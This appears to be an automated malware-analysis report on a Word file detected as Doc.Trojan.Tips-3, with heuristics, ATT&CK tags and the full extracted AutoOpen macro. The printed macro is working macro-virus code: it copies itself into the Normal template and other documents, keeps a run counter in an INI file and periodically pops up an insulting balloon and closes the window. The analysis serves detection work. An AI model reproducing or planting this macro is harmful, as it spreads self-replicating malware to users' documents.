Verdict: MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic AutoOpen macro, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. The AutoOpen macro is designed to execute automatically when the document is opened, which is a common technique for delivering malicious payloads. The macro attempts to manipulate the application's caption and status bar, potentially to mislead the user. While the full script is truncated, the presence of AutoOpen and the ClamAV detection strongly suggest malicious intent.
Heuristics 4
- ClamAV: Doc.Trojan.Tips-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Tips-3
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3672 bytes |

SHA-256: 6106fa3d44df470c995b81c29dc10477a7e92370d7dca1c745d13a3b19e2b673
Detection: ClamAV: Doc.Trojan.Tips-3
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 01/18/99 by billgates from cuddapah"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.AutoOpen"
'
' AutoOpen Macro
' Macro created 01/18/99 by CUDDAPAH BELLGATES FROM MACROSHOFT
'
Dim newstr, filenme, oldstr, normal_template As String
Dim o_docname, n_docname As String
Dim source_name, target_name, temp_var As String
Dim cond_name As String
Dim vrbl As Integer
Dim i As Integer
Dim j As Long
Dim cntnr As Object
Dim retval
Set cntnr = MacroContainer
'MsgBox cntnr.Name & " Is the container of this running code", vbCritical
cond_name = cntnr.Name
On Error GoTo err1
newstr = Application.ActiveWindow.Caption
filenme = newstr
newstr = newstr & " " & " "
Application.Caption = "Microsoft Word"
oldstr = newstr
Application.ActiveWindow.Caption = newstr
'Application.StatusBar = "Remember Microsoft Word is a Product of ORACLE Corporation INC!!!."
o_docname = Application.ActiveDocument.path
o_docname = o_docname & "\" & Application.ActiveDocument.Name
' ********* getting the source file name **********
If cond_name = Application.NormalTemplate.Name Then
'MsgBox "Condition One", vbCritical
source_name = Application.NormalTemplate.path
source_name = source_name & "\" & Application.NormalTemplate.Name
' ********* getting the target file name ***********
target_name = Application.ActiveDocument.path
target_name = target_name & "\" & Application.ActiveDocument.Name
Else
'MsgBox "Condition Two", vbCritical
source_name = Application.ActiveDocument.path
source_name = source_name & "\" & Application.ActiveDocument.Name
target_name = Application.NormalTemplate.path
target_name = target_name & "\" & Application.NormalTemplate.Name
End If
'MsgBox source_name & " " & target_name
'on counter set to four then message and counter = 0
temp_var = System.PrivateProfileString("C:\micros.Ini", "MacroSettings", _
"LastFile")
vrbl = Val(temp_var)
If vrbl = "8" Then
vrbl = 0
System.PrivateProfileString("C:\Micros.Ini", "MacroSettings", _
"LastFile") = Str(vrbl)
Set BLN = Assistant.NewBalloon
With BLN
.Heading = "Tips of the Day"
.Labels(1).Text = "Don't Shit in the Public Places."
.Labels(2).Text = "Don't throw Your Undergarments whereever u want"
.Labels(3).Text = "Don't Spit on your self"
.BalloonType = msoBalloon
.Mode = msoModeModal
.Icon = msoIconAlert
.Button = msoButtonSetOK
retval = .Show
End With
Application.ActiveWindow.Close
End If
vrbl = vrbl + 1
System.PrivateProfileString("C:\Micros.Ini", "MacroSettings", _
"LastFile") = Str(vrbl)
'MsgBox System.PrivateProfileString("C:\VirSet.Ini", "MacroSettings", _
"LastFile")
normal_template = Application.NormalTemplate.Name
On Error GoTo err0
Application.OrganizerCopy source_name, target_name, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy source_name, target_name, "BILLGATES", wdOrganizerObjectProjectItems
If target_name = normal_template Then
Application.NormalTemplate.Save
End If
Application.ActiveDocument.Save
'MsgBox o_docname
'MsgBox Application.ActiveDocument.Name
err0:
'MsgBox Err.Description
Exit Sub
err1:
End Sub
Attribute VB_Name = "BILLGATES"